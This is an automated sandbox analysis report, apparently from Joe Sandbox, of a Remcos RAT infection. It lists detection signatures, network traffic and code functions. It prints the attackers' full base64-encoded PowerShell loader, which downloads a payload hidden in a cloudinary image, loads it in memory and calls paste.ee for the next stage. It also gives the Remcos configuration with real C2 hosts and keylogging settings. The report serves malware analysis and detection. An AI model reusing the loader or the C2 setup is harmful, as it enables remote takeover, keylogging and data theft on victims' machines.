                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxl
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8064, ProcessName: svchost.exe

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Remcos
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7704, TargetFilename: C:\ProgramData\remcos\logs.dat

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T16:34:29.895976+010020204251Exploit Kit Activity Detected172.67.187.200443192.168.2.649772TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T16:34:29.895976+010020204241Exploit Kit Activity Detected172.67.187.200443192.168.2.649772TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T16:34:33.032018+010020365941Malware Command and Control Activity Detected192.168.2.64978345.80.158.3023101TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T16:34:10.058334+010020490381A Network Trojan was detected151.101.1.137443192.168.2.649714TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T16:34:35.733300+010028033043Unknown Traffic192.168.2.649790178.237.33.5080TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T16:34:30.873229+010028582951A Network Trojan was detected172.67.187.200443192.168.2.649772TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T16:34:29.498194+010028410751Malware Command and Control Activity Detected192.168.2.649772172.67.187.200443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: rem.pushswroller.euAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_0043293A
                        Source: MSBuild.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Contains functionality to bypass UAC (CMSTPLUA)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00406764 _wcslen,CoGetObject,15_2_00406764
                        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49714 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49760 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.6:49772 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,15_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0044D5E9 FindFirstFileExA,15_2_0044D5E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,15_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,15_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,15_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,15_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406F06

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49783 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49714
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.67.187.200:443 -> 192.168.2.6:49772
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.67.187.200:443 -> 192.168.2.6:49772
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.67.187.200:443 -> 192.168.2.6:49772
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: rem.pushswroller.eu
                        Source: Malware configuration extractorURLs: firewarzone.ydns.eu
                        Source: Malware configuration extractorURLs: sun.drillmmcsnk.eu
                        Connects to a pastebin service (likely for C&C)
                        Source: unknownDNS query: name: paste.ee
                        Source: global trafficTCP traffic: 192.168.2.6:49783 -> 45.80.158.30:23101
                        Source: classers.vbs.10.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                        Source: classers.vbs.10.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/TZC1n/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                        Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                        Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
                        Source: Joe Sandbox ViewASN Name: UK2NET-ASGB UK2NET-ASGB
                        Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49790 -> 178.237.33.50:80
                        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49772 -> 172.67.187.200:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004260F7 recv,15_2_004260F7
                        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/TZC1n/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: rem.pushswroller.eu
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: svchost.exe, 00000012.00000002.3420667451.000002DC70C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                        Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: qmgr.db.18.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp%h
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(V
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-V)
                        Source: MSBuild.exe, 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpVT
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                        Source: qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                        Source: svchost.exe, 00000012.00000003.2503873978.000002DC70B20000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49714 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49760 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.6:49772 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to register a low level keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000015_2_004099E4
                        Installs a global keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004159C6
